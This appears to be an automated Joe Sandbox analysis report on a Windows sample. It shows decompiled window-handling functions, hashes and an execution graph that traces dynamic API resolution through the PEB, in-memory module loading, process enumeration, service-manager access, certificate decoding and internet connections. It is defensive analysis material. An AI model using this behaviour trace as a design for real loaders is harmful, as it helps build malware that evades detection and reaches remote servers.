                                                                                                      • Instruction ID: 71ee6f97926f3856fb38d8acc99325eff636b6c3a3e39db7baf9f8622fdefe90
                                                                                                      • Opcode Fuzzy Hash: 48566344ed146de0b8674f4dbf59565948250181c04cde4cea3d311e08d734ea
                                                                                                      • Instruction Fuzzy Hash: 55019272A05300EBE720FFBB8802B4D77E0AF84725F21815FB055AB2D2DA7C5A41DA5D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 27%
                                                                                                      			E004013C0(void* __ecx, char _a4) {
                                                                                                      				signed int _v8;
                                                                                                      				struct tagRECT _v24;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t10;
                                                                                                      				char _t12;
                                                                                                      				intOrPtr _t17;
                                                                                                      				struct HWND__* _t18;
                                                                                                      				void* _t21;
                                                                                                      				void* _t25;
                                                                                                      				void* _t26;
                                                                                                      				void* _t27;
                                                                                                      				signed int _t28;
                                                                                                      
                                                                                                      				_t10 =  *0x435040; // 0x4b97bcea
                                                                                                      				_v8 = _t10 ^ _t28;
                                                                                                      				_t12 = _a4;
                                                                                                      				_t27 = __ecx;
                                                                                                      				 *((char*)(__ecx + 0x1c)) = _t12;
                                                                                                      				if(_t12 != 1) {
                                                                                                      					_push(0);
                                                                                                      				} else {
                                                                                                      					_push(8);
                                                                                                      				}
                                                                                                      				CheckMenuItem( *(_t27 + 8), 0x8007, ??);
                                                                                                      				GetWindowRect(GetDesktopWindow(),  &_v24);
                                                                                                      				_t17 = _v24.right;
                                                                                                      				_push(0);
                                                                                                      				_push(0x15);
                                                                                                      				if( *((char*)(_t27 + 0x1c)) != 1) {
                                                                                                      					_push(0x60);
                                                                                                      					_t18 = _t17 + 0xffffff5a;
                                                                                                      				} else {
                                                                                                      					_push(0x6f);
                                                                                                      					_t18 = _t17 + 0xffffff4b;
                                                                                                      				}
                                                                                                      				SetWindowPos(0xffffffff, _t18, 0, ??, ??, ??, ??);
                                                                                                      				return E004023FF(_t21, _v8 ^ _t28, _t25, _t26, _t27,  *((intOrPtr*)(_t27 + 0x18)));
                                                                                                      			}















                                                                                                      0x004013c6
                                                                                                      0x004013cd
                                                                                                      0x004013d0
                                                                                                      0x004013d4
                                                                                                      0x004013d6
                                                                                                      0x004013db
                                                                                                      0x004013e1
                                                                                                      0x004013dd
                                                                                                      0x004013dd
                                                                                                      0x004013dd
                                                                                                      0x004013eb
                                                                                                      0x004013fc
                                                                                                      0x00401406
                                                                                                      0x00401409
                                                                                                      0x0040140b
                                                                                                      0x0040140d
                                                                                                      0x00401418
                                                                                                      0x0040141a
                                                                                                      0x0040140f
                                                                                                      0x0040140f
                                                                                                      0x00401411
                                                                                                      0x00401411
                                                                                                      0x00401427
                                                                                                      0x0040143b

                                                                                                      APIs
                                                                                                      • CheckMenuItem.USER32(?,00008007,00000000), ref: 004013EB
                                                                                                      • GetDesktopWindow.USER32 ref: 004013F5
                                                                                                      • GetWindowRect.USER32 ref: 004013FC
                                                                                                      • SetWindowPos.USER32(?,000000FF,?,00000000,00000060,00000015,00000000), ref: 00401427
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CheckDesktopItemMenuRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2929785785-0
                                                                                                      • Opcode ID: d7b958e3aee06e6d16f74cefa40718701726e5fac4f80c110971a0d47a9ed7f9
                                                                                                      • Instruction ID: 4ec6a214ad47736028020126bdc7e96f7facac43f8b83d50418b479398a935c3
                                                                                                      • Opcode Fuzzy Hash: d7b958e3aee06e6d16f74cefa40718701726e5fac4f80c110971a0d47a9ed7f9
                                                                                                      • Instruction Fuzzy Hash: B1017031544708BBDB109F78DC05F5B77B4AF14310F1047B5F641BA1F1C6B599059B58
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 40%
                                                                                                      			E004017C0(void* __ecx) {
                                                                                                      				signed int _v8;
                                                                                                      				struct tagRECT _v24;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t8;
                                                                                                      				intOrPtr _t13;
                                                                                                      				struct HWND__* _t14;
                                                                                                      				void* _t19;
                                                                                                      				void* _t23;
                                                                                                      				void* _t24;
                                                                                                      				void* _t25;
                                                                                                      				signed int _t26;
                                                                                                      
                                                                                                      				_t8 =  *0x435040; // 0x4b97bcea
                                                                                                      				_v8 = _t8 ^ _t26;
                                                                                                      				_t25 = __ecx;
                                                                                                      				GetWindowRect(GetDesktopWindow(),  &_v24);
                                                                                                      				_t13 = _v24.right;
                                                                                                      				_push(0);
                                                                                                      				_push(0x15);
                                                                                                      				if( *((char*)(_t25 + 0x1c)) != 1) {
                                                                                                      					_push(0x60);
                                                                                                      					_t14 = _t13 + 0xffffff5a;
                                                                                                      				} else {
                                                                                                      					_push(0x6f);
                                                                                                      					_t14 = _t13 + 0xffffff4b;
                                                                                                      				}
                                                                                                      				SetWindowPos(0xffffffff, _t14, 0, ??, ??, ??, ??);
                                                                                                      				SetTimer( *(_t25 + 0x18), 0x4b0, 0x1f4, 0);
                                                                                                      				return E004023FF(_t19, _v8 ^ _t26, _t23, _t24, _t25,  *(_t25 + 0x18));
                                                                                                      			}














                                                                                                      0x004017c6
                                                                                                      0x004017cd
                                                                                                      0x004017d4
                                                                                                      0x004017de
                                                                                                      0x004017e8
                                                                                                      0x004017eb
                                                                                                      0x004017ed
                                                                                                      0x004017ef
                                                                                                      0x004017fa
                                                                                                      0x004017fc
                                                                                                      0x004017f1
                                                                                                      0x004017f1
                                                                                                      0x004017f3
                                                                                                      0x004017f3
                                                                                                      0x00401809
                                                                                                      0x0040181e
                                                                                                      0x00401834

                                                                                                      APIs
                                                                                                      • GetDesktopWindow.USER32 ref: 004017D7
                                                                                                      • GetWindowRect.USER32 ref: 004017DE
                                                                                                      • SetWindowPos.USER32(?,000000FF,?,00000000,00000060,00000015,00000000), ref: 00401809
                                                                                                      • SetTimer.USER32(?,000004B0,000001F4,00000000), ref: 0040181E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$DesktopRectTimer
                                                                                                      • String ID:
                                                                                                      • API String ID: 91234172-0
                                                                                                      • Opcode ID: 1c68ad366e7c43d19bd62a89e4fa351b2cce032a6b5b0dd0a4360c209e5c7187
                                                                                                      • Instruction ID: 6b23f4df32dcc82ddab87783e5b9c350f650593cbea79607f5b37a938873731b
                                                                                                      • Opcode Fuzzy Hash: 1c68ad366e7c43d19bd62a89e4fa351b2cce032a6b5b0dd0a4360c209e5c7187
                                                                                                      • Instruction Fuzzy Hash: 5801F971A40708BBDB109B74DC0AF6B7774EB04711F1006B9FA12AA1E1DAB5AD049B48
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.1%
                                                                                                      Dynamic/Decrypted Code Coverage:63.2%
                                                                                                      Signature Coverage:4.1%
                                                                                                      Total number of Nodes:538
                                                                                                      Total number of Limit Nodes:76

                                                                                                      Graph

                                                                                                      execution_graph 21872 402000 21874 402015 21872->21874 21873 40203c 21875 402085 LoadStringA LoadStringA LoadStringA 21873->21875 21876 40205e VirtualAlloc 21873->21876 21874->21873 21877 40202a GetProcAddress 21874->21877 21880 4020bd 21875->21880 21876->21875 21878 402077 21876->21878 21877->21873 21889 402190 21878->21889 21881 4020d6 LoadAcceleratorsA GetMessageA 21880->21881 21882 4020cd 21880->21882 21883 402134 21881->21883 21884 4020f8 21881->21884 21885 402104 TranslateAcceleratorA 21884->21885 21886 402124 GetMessageA 21885->21886 21887 402118 TranslateMessage DispatchMessageA 21885->21887 21886->21883 21886->21885 21887->21886 21896 4025d7 21889->21896 21892 4025d7 _malloc 58 API calls 21895 4021ad 21892->21895 21893 4022a9 21893->21875 21894 402246 ShowWindow 21894->21893 21894->21895 21895->21893 21895->21894 21897 402652 21896->21897 21903 4025e3 21896->21903 21919 4036e7 DecodePointer 21897->21919 21899 4025ee 21899->21903 21913 403d5e 58 API calls 2 library calls 21899->21913 21914 403dbb 58 API calls 9 library calls 21899->21914 21915 403918 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 21899->21915 21900 402658 21920 403fac 58 API calls __getptd_noexit 21900->21920 21903->21899 21904 402616 RtlAllocateHeap 21903->21904 21907 40263e 21903->21907 21911 40263c 21903->21911 21916 4036e7 DecodePointer 21903->21916 21904->21903 21905 4021a5 21904->21905 21905->21892 21917 403fac 58 API calls __getptd_noexit 21907->21917 21918 403fac 58 API calls __getptd_noexit 21911->21918 21913->21899 21914->21899 21916->21903 21917->21911 21918->21905 21919->21900 21920->21905 21921 401880 21922 4025d7 _malloc 58 API calls 21921->21922 21923 4018d8 LoadLibraryA GetProcAddress 21922->21923 21925 40191c 21923->21925 21926 401920 21925->21926 21927 40192f 21925->21927 21932 4023ff 6 API calls ___raise_securityfailure 21926->21932 21933 4023ff 6 API calls ___raise_securityfailure 21927->21933 21929 40192b 21931 40194e 21932->21929 21933->21931 21934 20b4c08 21942 20b4c10 21934->21942 21935 20b4cd7 Process32NextW 21935->21942 21936 20b4c3d 21937 20b4c72 CreateToolhelp32Snapshot 21940 20b4d47 21937->21940 21937->21942 21938 20b3e70 GetPEB 21938->21942 21939 20b4d20 21941 20b4d44 FindCloseChangeNotification 21939->21941 21948 20b3e70 GetPEB 21939->21948 21941->21940 21942->21935 21942->21936 21942->21937 21942->21938 21942->21939 21943 20b3dd0 GetPEB 21942->21943 21943->21942 21945 20b4d33 21949 20b3dd0 GetPEB 21945->21949 21947 20b4d3f 21947->21941 21948->21945 21949->21947 21950 20b5300 21955 20b5310 21950->21955 21951 20b53ee 21952 20b3e70 GetPEB 21952->21955 21953 20b5372 GetNativeSystemInfo 21953->21955 21954 20b3dd0 GetPEB 21954->21955 21955->21951 21955->21952 21955->21953 21955->21954 21956 20b1820 21957 20b182c 21956->21957 21958 20b1842 21956->21958 21979 20b3e70 GetPEB 21957->21979 21966 20b186b 21958->21966 21981 20b3e70 GetPEB 21958->21981 21960 20b1836 21980 20b3dd0 GetPEB 21960->21980 21963 20b185f 21982 20b3dd0 GetPEB 21963->21982 21965 20b18ce 21966->21965 21966->21966 21971 20b2580 21966->21971 21969 20b18bc 21978 20b2590 21971->21978 21972 20b291a 21984 20b4180 GetPEB 21972->21984 21973 20b2717 CryptDecodeObjectEx 21973->21978 21974 20b3e70 GetPEB 21974->21978 21976 20b18b8 21976->21969 21983 20b4180 GetPEB 21976->21983 21977 20b3dd0 GetPEB 21977->21978 21978->21972 21978->21973 21978->21974 21978->21976 21978->21977 21979->21960 21980->21958 21981->21963 21982->21966 21983->21965 21984->21976 21985 20b5fa0 21986 20b5fb3 21985->21986 21987 20b6065 21986->21987 21988 20b605e 21986->21988 22021 20b3e70 GetPEB 21986->22021 22022 20b3dd0 GetPEB 21986->22022 22008 20b3560 GetPEB 21987->22008 21990 20b6071 22000 20b6093 21990->22000 22023 20b3e70 GetPEB 21990->22023 21994 20b6087 22024 20b3dd0 GetPEB 21994->22024 21997 20b60d5 22004 20b60fd 21997->22004 22027 20b3e70 GetPEB 21997->22027 21998 20b60bf 22025 20b3e70 GetPEB 21998->22025 22009 20b5430 22000->22009 22002 20b60c9 22026 20b3dd0 GetPEB 22002->22026 22006 20b60f1 22028 20b3dd0 GetPEB 22006->22028 22008->21990 22010 20b5446 22009->22010 22015 20b545c 22009->22015 22029 20b3e70 GetPEB 22010->22029 22012 20b5450 22030 20b3dd0 GetPEB 22012->22030 22014 20b54d3 _snprintf 22014->21997 22014->21998 22015->22014 22016 20b54bb GetVolumeInformationW 22015->22016 22031 20b3e70 GetPEB 22015->22031 22016->22014 22018 20b54aa 22032 20b3dd0 GetPEB 22018->22032 22020 20b54b6 22020->22016 22021->21986 22022->21986 22023->21994 22024->22000 22025->22002 22026->21997 22027->22006 22028->22004 22029->22012 22030->22015 22031->22018 22032->22020 22033 20b9340 22038 20b9360 22033->22038 22034 20b940b 22036 20b9389 22034->22036 22034->22038 22060 20b4bf0 GetPEB CreateToolhelp32Snapshot Process32NextW FindCloseChangeNotification 22034->22060 22038->22034 22038->22036 22041 20b4620 22038->22041 22058 20b3e70 GetPEB 22038->22058 22059 20b3dd0 GetPEB 22038->22059 22042 20b4637 22041->22042 22047 20b464d 22041->22047 22061 20b3e70 GetPEB 22042->22061 22044 20b4641 22062 20b3dd0 GetPEB 22044->22062 22046 20b46c0 22046->22038 22047->22046 22048 20b4686 QueryFullProcessImageNameW 22047->22048 22063 20b3e70 GetPEB 22047->22063 22049 20b469c 22048->22049 22050 20b46b2 22048->22050 22065 20b3e70 GetPEB 22049->22065 22050->22038 22053 20b4675 22064 20b3dd0 GetPEB 22053->22064 22054 20b46a6 22066 20b3dd0 GetPEB 22054->22066 22057 20b4681 22057->22048 22058->22038 22059->22038 22060->22034 22061->22044 22062->22047 22063->22053 22064->22057 22065->22054 22066->22050 22067 20b3060 22076 20b307a 22067->22076 22068 20b3255 22070 20b3196 22068->22070 22077 20b3e70 GetPEB 22068->22077 22069 20b3e70 GetPEB 22069->22076 22071 20b3dd0 GetPEB 22071->22076 22073 20b3269 22078 20b3dd0 GetPEB 22073->22078 22074 20b310b RtlAllocateHeap 22074->22070 22074->22076 22076->22068 22076->22069 22076->22070 22076->22071 22076->22074 22077->22073 22078->22070 22079 402aec 22117 406001 22079->22117 22081 402af1 __mtinitlocknum 22121 4063b1 GetStartupInfoW 22081->22121 22084 402b07 22123 40408a GetProcessHeap 22084->22123 22085 402b5f 22086 402b6a 22085->22086 22216 402c8c 58 API calls 3 library calls 22085->22216 22124 40435e 22086->22124 22089 402b70 22090 402b7b __RTC_Initialize 22089->22090 22217 402c8c 58 API calls 3 library calls 22089->22217 22145 405991 22090->22145 22093 402b8a 22094 402b96 GetCommandLineA 22093->22094 22218 402c8c 58 API calls 3 library calls 22093->22218 22164 4060dd GetEnvironmentStringsW 22094->22164 22097 402b95 22097->22094 22101 402bbb 22188 405ed3 22101->22188 22105 402bcc 22204 403a75 22105->22204 22108 402bd4 22109 402bdf 22108->22109 22221 403a3b 58 API calls 3 library calls 22108->22221 22210 4067ca 22109->22210 22112 402c02 22223 403a66 58 API calls _doexit 22112->22223 22113 402be5 22113->22112 22222 403d4a 58 API calls _doexit 22113->22222 22116 402c07 __mtinitlocknum 22118 406031 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 22117->22118 22119 406024 22117->22119 22120 406028 22118->22120 22119->22118 22119->22120 22120->22081 22122 4063c7 22121->22122 22122->22084 22123->22085 22224 403b79 RtlEncodePointer 22124->22224 22126 404363 22230 406eac InitializeCriticalSectionAndSpinCount __mtinitlocknum 22126->22230 22128 404368 22129 40436c 22128->22129 22232 4062a5 TlsAlloc 22128->22232 22231 4043d4 61 API calls 2 library calls 22129->22231 22132 40437e 22132->22129 22134 404389 22132->22134 22133 404371 22133->22089 22233 40cff1 22134->22233 22136 404396 22137 4043cb 22136->22137 22239 406301 TlsSetValue 22136->22239 22241 4043d4 61 API calls 2 library calls 22137->22241 22140 4043aa 22140->22137 22142 4043b0 22140->22142 22141 4043d0 22141->22089 22240 4042ab 58 API calls 4 library calls 22142->22240 22144 4043b8 GetCurrentThreadId 22144->22089 22146 40599d __mtinitlocknum 22145->22146 22255 406d5b 22146->22255 22148 4059a4 22149 40cff1 __calloc_crt 58 API calls 22148->22149 22151 4059b5 22149->22151 22150 405a20 GetStartupInfoW 22158 405a35 22150->22158 22161 405b64 22150->22161 22151->22150 22152 4059c0 __mtinitlocknum @_EH4_CallFilterFunc@8 22151->22152 22152->22093 22153 405c2c 22264 405c3c LeaveCriticalSection _doexit 22153->22264 22155 40cff1 __calloc_crt 58 API calls 22155->22158 22156 405bb1 GetStdHandle 22156->22161 22157 405bc4 GetFileType 22157->22161 22158->22155 22159 405a83 22158->22159 22158->22161 22160 405ab7 GetFileType 22159->22160 22159->22161 22262 4063ec InitializeCriticalSectionAndSpinCount 22159->22262 22160->22159 22161->22153 22161->22156 22161->22157 22263 4063ec InitializeCriticalSectionAndSpinCount 22161->22263 22165 4060f0 WideCharToMultiByte 22164->22165 22166 402ba6 22164->22166 22168 406123 22165->22168 22169 40615a FreeEnvironmentStringsW 22165->22169 22177 405ca4 22166->22177 22267 40d039 58 API calls 2 library calls 22168->22267 22169->22166 22171 406129 22171->22169 22172 406130 WideCharToMultiByte 22171->22172 22173 406146 22172->22173 22174 40614f FreeEnvironmentStringsW 22172->22174 22268 402cb3 58 API calls 2 library calls 22173->22268 22174->22166 22176 40614c 22176->22174 22178 405cb2 22177->22178 22179 405cb7 GetModuleFileNameA 22177->22179 22275 40d993 70 API calls __setmbcp 22178->22275 22181 405ce4 22179->22181 22269 405d57 22181->22269 22183 402bb0 22183->22101 22219 403a3b 58 API calls 3 library calls 22183->22219 22186 405d1d 22186->22183 22187 405d57 _parse_cmdline 58 API calls 22186->22187 22187->22183 22189 405edc 22188->22189 22192 405ee1 _strlen 22188->22192 22279 40d993 70 API calls __setmbcp 22189->22279 22191 40cff1 __calloc_crt 58 API calls 22200 405f17 _strlen 22191->22200 22192->22191 22195 402bc1 22192->22195 22193 405f69 22281 402cb3 58 API calls 2 library calls 22193->22281 22195->22105 22220 403a3b 58 API calls 3 library calls 22195->22220 22196 40cff1 __calloc_crt 58 API calls 22196->22200 22197 405f90 22282 402cb3 58 API calls 2 library calls 22197->22282 22200->22193 22200->22195 22200->22196 22200->22197 22201 405fa7 22200->22201 22280 406c6e 58 API calls 2 library calls 22200->22280 22283 406c1e 8 API calls 2 library calls 22201->22283 22203 405fb3 22206 403a81 __IsNonwritableInCurrentImage 22204->22206 22284 40d14f 22206->22284 22207 403a9f __initterm_e 22209 403abe _doexit __IsNonwritableInCurrentImage 22207->22209 22287 40cfdc 67 API calls __cinit 22207->22287 22209->22108 22211 4067d6 22210->22211 22214 4067db 22210->22214 22288 40d993 70 API calls __setmbcp 22211->22288 22213 406819 22213->22113 22214->22213 22289 40f5db 58 API calls x_ismbbtype_l 22214->22289 22216->22086 22217->22090 22218->22097 22222->22112 22223->22116 22242 40370d 22224->22242 22226 403b8a __init_pointers __initp_misc_winsig 22243 4044cb EncodePointer 22226->22243 22228 403ba2 __init_pointers 22229 40645a 34 API calls 22228->22229 22229->22126 22230->22128 22231->22133 22232->22132 22235 40cff8 22233->22235 22236 40d033 22235->22236 22238 40d016 22235->22238 22244 40f9fa 22235->22244 22236->22136 22238->22235 22238->22236 22252 406777 Sleep 22238->22252 22239->22140 22240->22144 22241->22141 22242->22226 22243->22228 22245 40fa05 22244->22245 22247 40fa20 22244->22247 22246 40fa11 22245->22246 22245->22247 22253 403fac 58 API calls __getptd_noexit 22246->22253 22248 40fa30 RtlAllocateHeap 22247->22248 22250 40fa16 22247->22250 22254 4036e7 DecodePointer 22247->22254 22248->22247 22248->22250 22250->22235 22252->22238 22253->22250 22254->22247 22256 406d6c 22255->22256 22257 406d7f EnterCriticalSection 22255->22257 22265 406e03 58 API calls 6 library calls 22256->22265 22257->22148 22259 406d72 22259->22257 22266 403a3b 58 API calls 3 library calls 22259->22266 22262->22159 22263->22161 22264->22152 22265->22259 22267->22171 22268->22176 22271 405d79 22269->22271 22273 405ddd 22271->22273 22277 40f5db 58 API calls x_ismbbtype_l 22271->22277 22272 405cfa 22272->22183 22276 40d039 58 API calls 2 library calls 22272->22276 22273->22272 22278 40f5db 58 API calls x_ismbbtype_l 22273->22278 22275->22179 22276->22186 22277->22271 22278->22273 22279->22192 22280->22200 22281->22195 22282->22195 22283->22203 22285 40d152 EncodePointer 22284->22285 22285->22285 22286 40d16c 22285->22286 22286->22207 22287->22209 22288->22214 22289->22214 22290 20b9719 22303 20b9720 22290->22303 22291 20b9982 22293 20b99a1 22291->22293 22315 20b3e70 GetPEB 22291->22315 22292 20b3e70 GetPEB 22292->22303 22317 20b3000 FindFirstFileW FindNextFileW FindClose GetPEB 22293->22317 22295 20b97c9 OpenSCManagerW 22295->22303 22297 20b9995 22316 20b3dd0 GetPEB 22297->22316 22298 20b3dd0 GetPEB 22298->22303 22302 20b980f 22303->22291 22303->22292 22303->22295 22303->22298 22303->22302 22304 20b4220 22303->22304 22314 20b7c20 GetPEB 22303->22314 22305 20b4243 22304->22305 22306 20b422d 22304->22306 22311 20b426b 22305->22311 22320 20b3e70 GetPEB 22305->22320 22318 20b3e70 GetPEB 22306->22318 22308 20b4237 22319 20b3dd0 GetPEB 22308->22319 22311->22303 22312 20b425f 22321 20b3dd0 GetPEB 22312->22321 22314->22303 22315->22297 22316->22293 22317->22302 22318->22308 22319->22305 22320->22312 22321->22311 22322 20927b0 22325 2091000 22322->22325 22328 2091030 LoadLibraryW GetProcAddress 22325->22328 22369 2091b30 22328->22369 22331 2091091 SetLastError 22365 209102b ExitProcess 22331->22365 22332 20910a3 22333 2091b30 SetLastError 22332->22333 22334 20910b9 22333->22334 22335 20910de SetLastError 22334->22335 22336 20910f0 22334->22336 22334->22365 22335->22365 22337 20910ff SetLastError 22336->22337 22338 2091111 22336->22338 22337->22365 22339 209111c SetLastError 22338->22339 22341 209112e GetNativeSystemInfo 22338->22341 22339->22365 22342 20911bc 22341->22342 22343 20911e9 22342->22343 22344 20911d7 SetLastError 22342->22344 22372 2091800 VirtualAlloc 22343->22372 22344->22365 22345 2091202 22346 209123d GetProcessHeap RtlAllocateHeap 22345->22346 22373 2091800 VirtualAlloc 22345->22373 22347 209127b 22346->22347 22348 2091257 SetLastError 22346->22348 22352 2091b30 SetLastError 22347->22352 22348->22365 22349 2091222 22349->22346 22350 209122e SetLastError 22349->22350 22350->22365 22353 20912fb 22352->22353 22354 2091302 22353->22354 22374 2091800 VirtualAlloc 22353->22374 22400 20916c0 GetProcessHeap HeapFree VirtualFree 22354->22400 22355 2091320 22375 2091b50 22355->22375 22358 209136b 22358->22354 22381 20921a0 22358->22381 22362 20913ca 22362->22354 22363 20913eb 22362->22363 22364 20913ff GetPEB 22363->22364 22363->22365 22364->22365 22370 2091b3b SetLastError 22369->22370 22371 2091070 22369->22371 22370->22371 22371->22331 22371->22332 22371->22365 22372->22345 22373->22349 22374->22355 22376 2091b7d 22375->22376 22377 2091b30 SetLastError 22376->22377 22379 2091be9 22376->22379 22378 2091c32 22377->22378 22378->22379 22401 2091800 VirtualAlloc 22378->22401 22379->22358 22382 20921dd IsBadHugeReadPtr 22381->22382 22392 20913b5 22381->22392 22384 2092207 22382->22384 22382->22392 22385 2092239 SetLastError 22384->22385 22386 209224d 22384->22386 22384->22392 22385->22392 22402 2091a20 VirtualQuery VirtualFree VirtualAlloc 22386->22402 22388 2092267 22389 2092273 SetLastError 22388->22389 22391 209229d 22388->22391 22389->22392 22391->22392 22393 20923ae SetLastError 22391->22393 22392->22354 22394 2091e80 22392->22394 22393->22392 22398 2091eba 22394->22398 22395 2091fe5 22396 2091d10 2 API calls 22395->22396 22399 2091fc1 22396->22399 22398->22395 22398->22399 22403 2091d10 22398->22403 22399->22362 22400->22365 22401->22379 22402->22388 22404 2091d29 22403->22404 22408 2091d1f 22403->22408 22405 2091d37 22404->22405 22406 2091d9d VirtualProtect 22404->22406 22405->22408 22410 2091820 VirtualFree 22405->22410 22406->22408 22408->22398 22410->22408 22411 20b7010 22428 20b3460 22411->22428 22414 20b703f LoadLibraryW 22415 20b7055 22414->22415 22421 20b706b 22414->22421 22440 20b3e70 GetPEB 22415->22440 22418 20b702e 22439 20b3dd0 GetPEB 22418->22439 22420 20b705f 22441 20b3dd0 GetPEB 22420->22441 22424 20b7093 22421->22424 22442 20b3e70 GetPEB 22421->22442 22422 20b703a 22422->22414 22426 20b7087 22443 20b3dd0 GetPEB 22426->22443 22429 20b3483 22428->22429 22430 20b34a8 22429->22430 22444 20b3e70 GetPEB 22429->22444 22437 20b34d0 22430->22437 22446 20b3e70 GetPEB 22430->22446 22432 20b349c 22445 20b3dd0 GetPEB 22432->22445 22435 20b34c4 22447 20b3dd0 GetPEB 22435->22447 22437->22414 22438 20b3e70 GetPEB 22437->22438 22438->22418 22439->22422 22440->22420 22441->22421 22442->22426 22443->22424 22444->22432 22445->22430 22446->22435 22447->22437 22448 20b9d90 22459 20b9da0 22448->22459 22449 20b9e7f 22450 20b9ea3 CreateThread 22449->22450 22460 20b3e70 GetPEB 22449->22460 22452 20b9ebd 22450->22452 22462 20b99e0 22450->22462 22451 20b9e35 22454 20b9e92 22461 20b3dd0 GetPEB 22454->22461 22456 20b3dd0 GetPEB 22456->22459 22457 20b9e9e 22457->22450 22458 20b3e70 GetPEB 22458->22459 22459->22449 22459->22451 22459->22452 22459->22456 22459->22458 22460->22454 22461->22457 22473 20b9a00 22462->22473 22463 20b9c40 4 API calls 22463->22473 22464 20b9ba7 22465 20b9c0b 22465->22464 22486 20b3e70 GetPEB 22465->22486 22466 20b9b4d FindFirstChangeNotificationW 22474 20b9c40 22466->22474 22469 20b9c1e 22487 20b3dd0 GetPEB 22469->22487 22470 20b3e70 GetPEB 22470->22473 22472 20b3dd0 GetPEB 22472->22473 22473->22463 22473->22464 22473->22465 22473->22466 22473->22470 22473->22472 22475 20b9c50 22474->22475 22476 20b9c72 22475->22476 22477 20b3e70 GetPEB 22475->22477 22478 20b9d3b 22475->22478 22479 20b9d20 GetCurrentProcess QueryFullProcessImageNameW 22475->22479 22482 20b3dd0 GetPEB 22475->22482 22476->22473 22477->22475 22480 20b9d5f lstrcmpiW 22478->22480 22488 20b3e70 GetPEB 22478->22488 22479->22475 22480->22473 22482->22475 22483 20b9d4e 22489 20b3dd0 GetPEB 22483->22489 22485 20b9d5a 22485->22480 22486->22469 22487->22464 22488->22483 22489->22485 22490 20b8330 22492 20b83b0 22490->22492 22491 20b84cd CreateFileW 22491->22492 22493 20b848a 22491->22493 22492->22491 22492->22493 22494 20b3e70 GetPEB 22492->22494 22495 20b3dd0 GetPEB 22492->22495 22494->22492 22495->22492 22496 20b12b0 22521 20b12e1 22496->22521 22497 20b17bc 22498 20b17db 22497->22498 22584 20b3e70 GetPEB 22497->22584 22507 20b175c 22498->22507 22586 20b3e70 GetPEB 22498->22586 22502 20b4180 GetPEB 22502->22521 22503 20b17cf 22585 20b3dd0 GetPEB 22503->22585 22504 20b4220 GetPEB 22504->22521 22509 20b3460 GetPEB 22509->22521 22511 20b3e70 GetPEB 22511->22521 22515 20b17f7 22587 20b3dd0 GetPEB 22515->22587 22516 20b1561 _snwprintf 22578 20b3400 GetPEB 22516->22578 22518 20b17a6 22583 20b4180 GetPEB 22518->22583 22521->22497 22521->22502 22521->22504 22521->22507 22521->22509 22521->22511 22521->22516 22521->22518 22524 20b3dd0 GetPEB 22521->22524 22526 20b2240 22521->22526 22534 20b5b30 22521->22534 22556 20b2ba0 22521->22556 22576 20b4e10 GetPEB 22521->22576 22577 20b3400 GetPEB 22521->22577 22579 20b1df0 GetPEB 22521->22579 22580 20b18e0 GetPEB 22521->22580 22581 20b1c10 GetPEB 22521->22581 22582 20b1f60 GetPEB 22521->22582 22523 20b17ad 22524->22521 22532 20b225b 22526->22532 22527 20b254f 22527->22521 22528 20b255c 22528->22527 22588 20b4180 GetPEB 22528->22588 22529 20b3e70 GetPEB 22529->22532 22531 20b4220 GetPEB 22531->22532 22532->22527 22532->22528 22532->22529 22532->22531 22533 20b3dd0 GetPEB 22532->22533 22533->22532 22535 20b5b56 22534->22535 22536 20b5b40 22534->22536 22540 20b5b83 RtlAllocateHeap 22535->22540 22591 20b3e70 GetPEB 22535->22591 22589 20b3e70 GetPEB 22536->22589 22538 20b5b4a 22590 20b3dd0 GetPEB 22538->22590 22541 20b5c02 22540->22541 22545 20b5b93 22540->22545 22541->22521 22543 20b5b72 22592 20b3dd0 GetPEB 22543->22592 22547 20b5bc9 22545->22547 22593 20b3e70 GetPEB 22545->22593 22546 20b5b7e 22546->22540 22551 20b5bf6 RtlFreeHeap 22547->22551 22595 20b3e70 GetPEB 22547->22595 22549 20b5bbd 22594 20b3dd0 GetPEB 22549->22594 22551->22521 22553 20b5be5 22596 20b3dd0 GetPEB 22553->22596 22555 20b5bf1 22555->22551 22566 20b2bda 22556->22566 22557 20b2ebf InternetConnectW 22557->22566 22558 20b2f8c 22571 20b2fab 22558->22571 22601 20b3e70 GetPEB 22558->22601 22560 20b2d51 InternetOpenW 22560->22566 22561 